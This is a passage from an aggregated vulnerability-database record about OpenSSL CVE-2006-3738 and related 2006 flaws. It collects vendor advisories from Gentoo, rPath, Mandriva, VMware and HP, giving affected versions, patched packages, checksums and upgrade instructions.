            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayproductinfo.pl?productnumber=hpuxwssuite"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com/portal/swdepot/displayproductinfo.do?productnumber=b6834aa"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2969"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26977.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26866.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3747"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26864.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2006-09-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2006-09-28T00:00:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2007-01-16T00:00:00",
            "db": "BID",
            "id": "22083"
          },
          {
            "date": "2006-09-28T12:12:12",
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "date": "2007-10-09T00:39:04",
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "date": "2006-10-04T00:44:50",
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "date": "2007-10-05T05:29:31",
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "date": "2006-10-04T01:20:54",
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "date": "2007-01-27T02:35:42",
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "date": "2007-08-08T07:19:47",
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "date": "2006-09-28T18:07:00",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "date": "2007-02-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "date": "2011-07-22T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "date": "2011-05-09T19:52:00",
            "db": "BID",
            "id": "20249"
          },
          {
            "date": "2008-05-20T23:05:00",
            "db": "BID",
            "id": "22083"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "network",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OpenSSL SSLv2 client code fails to properly check for NULL",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Boundary Condition Error",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      }
    }

    VAR-200609-1416

    Vulnerability from variot - Updated: 2025-11-24 22:25

    Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. Successfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users.

    Background

    OpenSSL is an implementation of the Secure Socket Layer and Transport Layer Security protocols.

    Affected packages

    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
    

    1 dev-libs/openssl < 0.9.8e-r3 >= 0.9.8e-r3

    Description

    Moritz Jodeit reported an off-by-one error in the SSL_get_shared_ciphers() function, resulting from an incomplete fix of CVE-2006-3738. A flaw has also been reported in the BN_from_montgomery() function in crypto/bn/bn_mont.c when performing Montgomery multiplication. A local attacker could perform a side channel attack to retrieve the RSA private keys.

    Workaround

    There is no known workaround at this time.

    Resolution

    All OpenSSL users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8e-r3"
    

    References

    [ 1 ] CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 [ 2 ] CVE-2007-3108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3108 [ 3 ] CVE-2007-5135 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200710-06.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

    License

    Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. rPath Security Advisory: 2006-0175-2 Published: 2006-09-28 Updated: 2006-09-29 Resolved issue in patch for CVE-2006-2940 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.

    29 September 2006 Update: The initial fix for this vulnerability was
    incomplete, and the fault in the fix could enable a Denial of Service
    attack in some cases of the attack described in CVE-2006-2940.
    

    Full-Disclosure - We believe in it.

    Update:

    There was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343


    Updated Packages:

    Mandriva Linux 2006.0: 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm 526fcd69e1a1768c82afd573dc16982f 2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

    Mandriva Linux 2006.0/X86_64: 54ed69fc4976d3c0953eeebd3c10471a 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm 632fbe5eaff684ec2f27da4bbe93c4f6 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 04dbe52bda3051101db73fabe687bd7e 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm ca169246cc85db55839b265b90e8c842 2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm

    Mandriva Linux 2007.0: db68f8f239604fb76a0a10c70104ef61 2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm a97c6033a33fabcd5509568304b7a988 2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: 1895971ef1221056075c4ee3d4aaac72 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm cfd59201e5e9c436f42b969b4aa567f1 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm 36da85c76eddf95feeb3f4b792528483 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm db68f8f239604fb76a0a10c70104ef61 2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm e3aebeae455a0820c5f28483bd6d3fa5 2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm

    Corporate 3.0: 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 1e7834f6f0fe000f8f00ff49ee6f7ea0 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm 6c86220445ef34c2dadadc3e00701885 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm c25c4042a91b6e7bf9aae1aa2fea32a5 corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 3.0/X86_64: 52dfd4d10e00c9bd0944e4486190de93 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm 258a19afc44dadfaa00d0ebd8b3c0df4 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm cd5cc151e476552be549c6a37b8a71ea corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 492fcc0df9172557a3297d0082321d4d corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm

    Corporate 4.0: 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm daa6c3473f59405778dedd02de73fcc9 corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: b5ae71aacd5b99be9e9327d58da29230 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm 89296e03778a198940c1c413e44b9f45 corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm cb17a0d801c1181ab380472b8ffb085e corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 8d9a55afdc6d930916bac00fd4c4739b corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm

    Multi Network Firewall 2.0: cd7ad7e95ce17995dfa8129ebe517049 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm 11771240baebdc6687af70a8a0f2ffd2 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm 8f672bc81b9528598a8560d876612bfa mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm 214f857a36e5c3e600671b7291cd08ae mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm bbb299fd643ccbfbdc1a48b12c7005ce mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

    gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

    You can view other update advisories for Mandriva Linux at:

    http://www.mandriva.com/security/advisories

    If you want to report vulnerabilities, please contact

    security_(at)_mandriva.com


    Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)

    iD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3 mAaLoEPfjUca1TR98vgpZUU= =Ff9O -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256


                   VMware Security Advisory
    

    Advisory ID: VMSA-2007-0001 Synopsis: VMware ESX server security updates Issue date: 2007-01-08 Updated on: 2007-01-08 CVE: CVE-2006-3589 CVE-2006-2937 CVE-2006-2940 CVE-2006-3738 CVE-2006-4339 CVE-2006-4343 CVE-2006-4980


    1. Summary:

    Updated ESX Patches address several security issues.

    1. Relevant releases:

    VMware ESX 3.0.1 without patch ESX-9986131 VMware ESX 3.0.0 without patch ESX-3069097

    VMware ESX 2.5.4 prior to upgrade patch 3 VMware ESX 2.5.3 prior to upgrade patch 6 VMware ESX 2.1.3 prior to upgrade patch 4 VMware ESX 2.0.2 prior to upgrade patch 4

    1. Problem description:

    Problems addressed by these patches:

    a. Incorrect permissions on SSL key files generated by vmware-config (CVE-2006-3589):

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with the configuration program
    vmware-config which could set incorrect permissions on SSL key
    files. Local users may be able to obtain access to the SSL key
    files. The Common Vulnerabilities and Exposures project
    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue.
    

    b. OpenSSL library vulnerabilities:

    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131
    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d
    allows remote attackers to cause a denial of service (infinite
    loop and memory consumption) via malformed ASN.1 structures that
    trigger an improperly handled error condition.
    
    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,
    and earlier versions allows attackers to cause a denial of service
    (CPU consumption) via parasitic public keys with large (1) "public
    exponent" or (2) "public modulus" values in X.509 certificates that
    require extra time to process when using RSA signature verification.
    
    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8
    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1
    padding before generating a hash, which allows remote attackers to
    forge a PKCS #1 v1.5 signature that is signed by that RSA key and
    prevents OpenSSL from correctly verifying X.509 and other
    certificates that use PKCS #1.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,
    CVE-2006-4339, and CVE-2006-4343 to these issues.
    

    c. Updated OpenSSH package addresses the following possible security issues:

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by Patch ESX-3069097
    ESX 2.5.4: does not have these problems
    ESX 2.5.3: does not have these problems
    ESX 2.1.3: does not have these problems
    ESX 2.0.2: does not have these problems
    
    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly
    other versions, when using privilege separation, does not properly
    signal the non-privileged process when a session has been terminated
    after exceeding the LoginGraceTime setting, which leaves the
    connection open and allows remote attackers to cause a denial of
    service (connection consumption).
    
    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute
    arbitrary commands via filenames that contain shell metacharacters
    or spaces, which are expanded twice.
    
    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host
    access by numeric IP addresses and with VerifyReverseMapping
    disabled, allows remote attackers to bypass "from=" and "user@host"
    address restrictions by connecting to a host from a system whose
    reverse DNS hostname contains the numeric IP address.
    
    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1
    SSH protocol, allows remote attackers to cause a denial of service
    (CPU consumption) via an SSH packet that contains duplicate blocks,
    which is not properly handled by the CRC compensation attack
    detector.
    
    NOTE: ESX by default disables version 1 SSH protocol.
    
    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4
    allows remote attackers to cause a denial of service (crash), and
    possibly execute arbitrary code if GSSAPI authentication is enabled,
    via unspecified vectors that lead to a double-free.
    
    NOTE: ESX doesn't use GSSAPI by default.
    
    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege
    Separation Monitor in OpenSSH before 4.5 causes weaker verification
    that authentication has been successful, which might allow attackers
    to bypass authentication.
    
    NOTE: as of 20061108, it is believed that this issue is only
    exploitable by leveraging vulnerabilities in the unprivileged
    process, which are not known to exist.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,
    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues.
    

    d. Object reuse problems with newly created virtual disk (.vmdk or .dsk) files:

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with virtual disk (.vmdk or .dsk) files
    that are newly created, but contain blocks from recently deleted
    virtual disk files.  Information belonging to the previously
    deleted virtual disk files could be revealed in newly created
    virtual disk files.
    
    VMware recommends the following workaround: When creating new
    virtual machines on an ESX Server that may contain sensitive
    data, use vmkfstools with the -W option. This initializes the
    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w.
    

    e. Buffer overflow in Python function repr():

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by ESX-3069097
    ESX 2.5.4: does not have this problem
    ESX 2.5.3: does not have this problem
    ESX 2.1.3: does not have this problem
    ESX 2.0.2: does not have this problem
    
    A possible security issue with how the Python function repr()
    function handles UTF-32/UCS-4 strings.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the name CVE-2006-4980 to this issue.
    
    1. Solution:

    Please review the Patch notes for your version of ESX and verify the md5sum.

    ESX 3.0.1 http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html md5usm: 239375e107fd4c7af57663f023863fcb

    ESX 3.0.0 http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html md5sum: ca9947239fffda708f2c94f519df33dc

    ESX 2.5.4 http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html md5sum: 239375e107fd4c7af57663f023863fcb

    ESX 2.5.3 http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html md5sum: f90fcab28362edbf2311f3ca90cc7739

    ESX 2.1.3 http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f

    ESX 2.0.2 http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html md5sum: 925e70f28d17714c53fdbd24de64329f

    1. References:

    ESX 3.0.0 Patch URL: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html Knowledge base URL: http://kb.vmware.com/kb/3069097

    ESX 3.0.1 Patch URL: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html Knowledge base URL: http://kb.vmware.com/kb/9986131

    ESX 2.5.4 Patch URL: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html

    ESX 2.5.3 Patch URL: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html

    ESX 2.1.3 Patch URL: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html

    ESX 2.0.2 Patch URL: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980

    1. Contact:

    http://www.vmware.com/security

    VMware Security Response Policy http://www.vmware.com/vmtn/technology/security/security_response.html

    E-mail: security@vmware.com

    Copyright 2007 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE neFG0RikD74TCYeXKW6CBy4= =9/6k -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . The following supported software versions are affected: HP Tru64 UNIX v 5.1B-4 (SSL and BIND) HP Tru64 UNIX v 5.1B-3 (SSL and BIND) HP Tru64 UNIX v 5.1A PK6 (BIND) HP Tru64 UNIX v 4.0G PK4 (BIND) HP Tru64 UNIX v 4.0F PK8 (BIND) Internet Express (IX) v 6.6 BIND (BIND) HP Insight Management Agents for Tru64 UNIX patch v 3.5.2 and earlier (SSL)

    BACKGROUND

    RESOLUTION

    HP has released the following Early Release Patch kits (ERPs) publicly for use by any customer. The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERP. A new patch version for HP Insight Management Agents for Tru64 UNIX is also available that addresses the potential vulnerabilities.

    The fixes contained in the ERP kits will be available in the following mainstream releases: -Targeted for availability in HP Tru64 UNIX v 5.1B-5 -Internet Express (IX) v 6.7 -HP Insight Management Agents for Tru64 UNIX patch v 3.6.1 (already available)

    HP Tru64 UNIX Version 5.1B-4 ERP Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001167-V51BB27-ES-20070321 Name: T64KIT1001167-V51BB27-ES-20070321 MD5 Checksum: a697a90bd0b1116b6f27d1100bbf81fd

    HP Tru64 UNIX Version 5.1B-3 ERP Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001163-V51BB26-ES-20070315 Name: T64KIT1001163-V51BB26-ES-20070315 MD5 Checksum: d376d403176f0dbe7badd4df4e91c126

    HP Tru64 UNIX Version 5.1A PK6 ERP Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001160-V51AB24-ES-20070314 Name: T64KIT1001160-V51AB24-ES-20070314 MD5 Checksum: 7bb43ef667993f7c4711b6cf978e0aa7

    HP Tru64 UNIX Version 4.0G PK4 ERP Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001166-V40GB22-ES-20070316 Name: T64KIT1001166-V40GB22-ES-20070316 MD5 Checksum: a446c39169b769c4a03c654844d5ac45

